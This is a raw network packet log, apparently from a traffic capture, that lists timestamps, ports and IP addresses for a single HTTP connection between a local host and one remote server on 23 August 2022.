Aug 23, 2022 18:25:29.259692907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259716988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259731054 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259742022 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259756088 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259766102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259785891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259790897 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259808064 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259815931 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259829998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259852886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259875059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259876966 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259911060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.259921074 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259952068 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.259970903 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260010958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260035038 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260059118 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260061026 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260090113 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260113001 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260113955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260137081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260142088 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260162115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260184050 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260186911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260207891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260216951 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260235071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260258913 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260261059 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260282993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260294914 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260310888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260337114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260339975 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260374069 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260386944 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260412931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260420084 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260437012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260462046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260468006 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260487080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260509968 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260510921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260529995 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260535002 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260560036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260564089 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260586023 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260587931 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260610104 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260611057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260633945 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260634899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.260658026 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.260678053 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.295211077 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.295583010 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.300477982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300573111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300615072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300654888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300693989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300734043 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300776005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300818920 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300857067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300862074 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.300899982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300940037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.300976038 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301018953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301029921 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301043034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301059961 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301067114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301088095 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301090956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301114082 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301115036 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301132917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301150084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301167965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301192045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301218987 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301253080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301280975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301345110 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301362991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301382065 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301383972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301404953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301414013 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301425934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301435947 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301448107 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301457882 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301470995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301480055 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301496029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301501036 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301521063 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301522970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301543951 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301548004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301567078 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301574945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301594019 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301599979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301625013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301631927 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301649094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301673889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301680088 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301697969 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301711082 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301719904 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301743031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301755905 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301764965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301789045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301799059 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301816940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301819086 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301842928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301855087 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301867962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301878929 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301893950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301903963 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301918983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301928043 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301944971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301955938 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301968098 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.301978111 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.301989079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302010059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302031994 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302054882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302058935 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.302077055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302098989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302119970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302143097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302165985 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302196980 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302218914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302244902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302263021 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302287102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302311897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302335024 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302356958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302378893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302401066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302423954 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302445889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302468061 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302491903 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302515984 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302537918 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302561045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302582979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302608013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302633047 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302655935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302680969 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302700996 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302723885 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302750111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302773952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302798033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302819014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302841902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302860975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302884102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302905083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302928925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302953005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302974939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.302999973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303021908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303230047 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303267002 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303289890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303313017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303333998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303385973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303411961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303437948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303459883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303486109 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303510904 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303533077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303555965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303579092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303601027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303627968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303657055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303682089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303705931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303728104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303751945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303775072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303798914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303822994 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303844929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303869963 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303895950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303920031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303941011 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303965092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.303989887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304016113 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304037094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304059029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304089069 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304111958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304133892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304156065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304182053 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304204941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304229975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304265976 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304286957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304307938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.304328918 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.321707964 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.321788073 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.321826935 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.321881056 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.321990013 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.322077990 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.322321892 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.322385073 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.322441101 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.322524071 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.335218906 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335264921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335289955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335314989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335340023 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335381985 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335403919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335424900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335457087 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335484982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335545063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335577011 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335598946 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335629940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335659981 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335683107 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335709095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335738897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335766077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335793972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335817099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335845947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335875988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335905075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335936069 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335966110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.335994005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336024046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336047888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336076975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336106062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336134911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336163998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336191893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336221933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336256027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336285114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336314917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336343050 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336369038 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336399078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336429119 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336458921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336496115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336524963 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336554050 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336582899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336610079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336642981 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336673975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336704016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336734056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336764097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.336792946 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.342366934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.342443943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.342470884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.342502117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.342531919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.343506098 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.346041918 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.346123934 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.346190929 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.346266031 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.346407890 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.360774040 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.361370087 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.400295019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400341034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400366068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400389910 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400413036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400437117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400459051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400476933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400500059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400541067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400571108 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400590897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400633097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400654078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400674105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400695086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400731087 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400753975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400774956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400796890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400819063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400840998 CEST	80	49943	88.198.122.116	192.168.2.3
